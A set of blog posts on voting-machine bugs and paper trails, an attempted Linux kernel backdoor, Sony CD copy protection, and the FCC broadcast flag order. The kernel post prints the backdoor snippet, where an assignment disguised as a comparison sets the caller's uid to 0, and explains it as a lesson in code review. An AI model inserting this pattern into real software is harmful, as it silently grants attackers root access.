November 27, 2024

Flaky Voting Technology

Opponents of unauditable e-voting technology often talk about the threat of fraud. They worry that somebody will compromise a voting machine, or corrupt the machines’ software, in order to steal an election. We should worry about fraud. But just as important, and more likely, is the possibility that software bugs will cause a miscount that gives an election to the wrong candidate.

This may be what happened two weeks ago in a school board race in Fairfax County, Virginia. David Cho at the Washington Post reports:

School Board member Rita S. Thompson (R), who lost a close race to retain her at-large seat, said yesterday that the new computers might have taken votes from her. Voters in three precincts reported that when they attempted to vote for her, the machines initially displayed an “x” next to her name but then, after a few seconds, the “x” disappeared.

In response to Thompson’s complaints, county officials tested one of the machines in question yesterday and discovered that it seemed to subtract a vote for Thompson in about “one out of a hundred tries,” said Margaret K. Luca, secretary of the county Board of Elections.

“It’s hard not to think that I have been robbed,” said Thompson, whose 77,796 recorded votes left her 1,662 shy of reelection. She is considering her next step, and said she was wary of challenging the election results: “I’m not sure the county as a whole is up for that. I’m not sure I’m up for that.”

And how do we know the cause was a bug, rather than fraud? Because the error was visible to voters. If this had been fraud, the “X” on the screen would never have disappeared – but the vote would have been given, silently, to the wrong candidate.

You could hardly construct a better textbook illustration of the importance of having a voter-verifiable paper trail. The paper trail would have helped voters notice the disappearance of their votes, and it would have provided a reliable record to consult in a later recount. As it is, we’ll never know who really won the election.
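
A toy sketch, with every name invented purely for illustration, of what a voter-verifiable paper trail adds: the machine keeps its electronic count, but it also prints a record the voter inspects before leaving, and an audit can later compare the two tallies independently.

/* Illustrative only -- not any real voting system's code. */
#include <stdio.h>

static int electronic_tally;    /* software count, where a bug can silently drop votes */
static int paper_tally;         /* stands in for counting the printed, voter-verified ballots */

static void cast_vote(const char *candidate)
{
        electronic_tally++;
        printf("PAPER RECORD: vote for %s\n", candidate);  /* the voter inspects this */
        paper_tally++;
}

static int audit_agrees(void)
{
        /* A recount of the paper records either confirms the electronic
         * count or exposes a discrepancy.  The Fairfax machines offered
         * no such independent record. */
        return electronic_tally == paper_tally;
}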

Linux Backdoor Attempt Thwarted

Kerneltrap.org reports that somebody tried last week to sneak a snippet of malicious code into the Linux kernel’s source code, to create a backdoor that could be exploited later to seize control of Linux machines. Fortunately, members of the software development team spotted the problem the next day and removed the offending code.

The malicious code snippet was small but it was constructed cleverly, so that most programmers would miss the problem on casual reading of the code.

This incident illuminates an interesting debate on the security tradeoffs between open-source and proprietary code. Opponents of open-source argue that the open development process makes it easier for a bad guy to inject malicious code. Fans of open-source argue that open code makes it easier for the good guys to spot problems. Both groups can find some support in this story, in which an unknown person did inject malicious code, and open-source developers did read the code and spot the problem.

What we don’t know is how often this sort of thing happens in proprietary software development. There must be some attempts to insert malicious code, given the amount of money at stake and the sheer number of people who have the opportunity to try inserting a backdoor. But we don’t know how many people try, or how quickly they are caught.

[Technogeek readers: The offending code is below. Can you spot the problem?

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
]
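
[Spoiler, for readers who would rather not puzzle over it: the second clause uses “=” where a comparison would use “==”. Instead of testing whether the caller already has uid 0, it assigns uid 0 to the calling process, quietly giving the caller root whenever that unusual combination of options is passed; and because the assignment evaluates to zero, the retval line never runs, so nothing visible happens. The innocent-looking check it imitates would presumably have read:

if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
]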

New Sony CD-DRM Technology Upcoming

Reuters reports that a new CD copy-protection technology from Sony debuted yesterday in Germany, on a recording by the group Naturally Seven. Does anybody know how I can get a copy of this CD?

UPDATE (12:30 PM): Thanks to Joe Barillari and Scott Ananian for pointing me to amazon.de, where I ordered the CD. (At least I think I did; my German is pretty poor.)

Broadcast Flag Scorecard

Before the FCC issued its Broadcast Flag Order, I wrote a post on “Reading the Broadcast Flag Rules”, in which I recommended reading the eventual Order carefully since “the details can make a big difference.” I pointed to four specific choices the FCC had to make.

Let’s look at how the FCC chose. For each of the four issues I identified, I’ll quote in italics my previous posting, and then I’ll summarize the FCC’s action.

First, look at the criteria that an anti-copying technology must meet to be on the list of approved technologies. Must a technology give copyright owners control over all uses of content; or is a technology allowed [to] support legal uses such as time-shifting; or is it required to support such uses?

The Order says that technologies must prevent “indiscriminate redistribution”, but it isn’t precise about what that term means. The precise scope of permissible redistribution is deferred to a later rulemaking. There is also some language expressing a desire not to control copying within the home, but that desire may not be backed by a formal requirement.

Verdict: This issue is still unresolved; perhaps the later rulemaking will clarify it.

Second, look at who decides which technologies can be on the approved list. Whoever makes this decision will control entry into the market for digital TV decoders. Is this up to the movie and TV industries; or does an administrative body like the FCC decide; or is each vendor responsible for determining whether their own technology meets the requirements?

This issue was deferred to a later rulemaking process, so we don’t know what the final answer will be. The FCC does appear to understand the danger inherent in letting the entertainment industry control the list.

The Order does establish an interim approval mechanism, in which the FCC makes the final decisions, after a streamlined filing and counter-filing process by the affected parties.

Verdict: This issue was deferred until later, but the FCC seems to be leaning in the right direction.

Third, see whether the regulatory process allows for the possibility that no suitable anti-copying technology exists. Will the mandate be delayed if no strong anti-copying technology exists; or do the rules require that some technology be certified by a certain date, even if none is up to par?

The Order doesn’t address this issue head-on. It does say that to qualify, a technology need only resist attacks by ordinary users using widely available tools. This decision, along with the lack of precision about the scope of home copying that will be allowed, makes it easier to find a compliant technology later.

Verdict: This issue was not specifically addressed; it may be clarified in the later rulemaking.

Finally, look at which types of devices are subject to design mandates. To be covered, must a device be primarily designed for decoding digital TV; or is it enough for it to be merely capable of doing so? Do the mandates apply broadly to “downstream devices”? And is something a “downstream device” based on what it is primarily designed to do, or on what it is merely capable of doing?

This last issue is the most important, since it defines how broadly the rule will interfere with technological progress. The worst-case scenario is an overbroad rule that ends up micro-managing the design of general-purpose technologies like personal computers and the Internet. I know the FCC means well, but I wish I could say I was 100% sure that they would not make that mistake.

The Order regulates Digital TV demodulators, as well as Transport Stream Processors (which take the demodulated signal and separate it into its digital audio, video, and metadata components).

The impact on general-purpose computers is a bit hard to determine. It appears that if a computer contains a DTV receiver card, the communications between that card and the rest of the computer would be regulated. This would then impact the design of any applications or device drivers that handle the DTV stream coming from the card.
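
To make the driver-level impact concrete, here is a minimal sketch of the kind of check a regulated capture driver might have to perform. The interface is invented purely for illustration; the Order mandates outcomes, not code, and real ATSC flag signaling is carried in the transport stream rather than as a single bit per packet.

/* Illustrative only: a DTV capture driver under a flag mandate may hand
 * flagged content only to outputs that use an approved protection
 * technology.  Names and structure are hypothetical. */
#include <stdint.h>
#include <stdbool.h>

#define TS_PACKET_SIZE 188

struct ts_packet {
        uint8_t data[TS_PACKET_SIZE];
        bool flagged;           /* broadcast flag, as reported by the tuner card */
};

enum output_path { OUTPUT_PROTECTED, OUTPUT_UNPROTECTED };

static bool may_forward(const struct ts_packet *pkt, enum output_path path)
{
        if (!pkt->flagged)
                return true;                    /* unflagged content: no restriction */
        return path == OUTPUT_PROTECTED;        /* flagged content: approved outputs only */
}

Every application or driver that touches the stream coming off the card would have to route its data through a gate like this one, which is why the scope question matters so much for general-purpose computers.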

Verdict: The FCC seems to have been trying to limit the negative impact of the Order by limiting its scope, but some broad impacts seem to be inevitable side effects of mandating any kind of Flag.

Bottom line: The FCC’s order will be harmful; but it could have been much, much worse.

The Broadcast Flag, and Threat Model Confusion

The FCC has mandated “broadcast flag” technology, which will limit technical options for the designers of digital TV tuners and related products. This is intended to reduce online redistribution of digital TV content, but it is likely to have little or no actual effect on the availability of infringing content on the Net.

The FCC is committing the classic mistake of not having a clear threat model. As I explained in more detail in a previous post, a “threat model” is a clearly defined explanation of what a security system is trying to prevent, and of the capabilities and motives of the people who are trying to defeat it. For a system like the broadcast flag, there are two threat models to choose from. Either you are trying to keep the average consumer from giving content to his friends and neighbors (the “casual copying” threat model), or you are trying to keep the content off of Internet distribution systems like KaZaa (the “Napsterization” threat model). You choose a threat model, and then you design a technology that prevents the threat you have chosen.

If you choose the casual copying model, your DRM technology needs to be strong enough to resist attack by average consumers only; but your technology will not address the Napsterization threat. If you choose the Napsterization threat model, then you have to be able to stop every would-be infringer from ripping the content, because if even one person manages to rip the content and upload it onto the Net, the content becomes available to everybody who wants it.
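
A back-of-the-envelope calculation (my numbers, purely for illustration) shows why the second model is so demanding. If each of N viewers independently manages to defeat the protection with probability p, the chance that at least one unprotected copy reaches the Net is

        1 - (1 - p)^N

which is essentially 1 for a broadcast-sized audience, even when p is tiny. A technology that merely makes ripping harder lowers p; it cannot make that quantity small.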

The FCC seems to be trying to have it both ways. They have mandated technologies that are only strong enough to prevent casual copying by typical consumers. But at the same time, they somehow expect those technologies to prevent Napsterization. This incoherence is evident throughout the FCC’s broadcast flag order. At several points the two incompatible threat models appear in the same paragraph; here is an example:

19. We recognize the concerns of commenters regarding potential vulnerabilities in a flag-based protection system. We are equally mindful of the fact that it is difficult if not impossible to construct a content protection scheme that is impervious to attack or circumvention. We believe, however, that the benefits achieved by creation of a flag-based system – creating a “speed bump” mechanism to prevent indiscriminate redistribution of broadcast content and ensure the continued availability of high value content to broadcast outlets – outweighs the potential vulnerabilities cited by commenters….

(emphasis added) The error here should be clear – a “speed bump” cannot prevent “indiscriminate redistribution”.

(I’ll have more to say about the broadcast flag in subsequent posts.)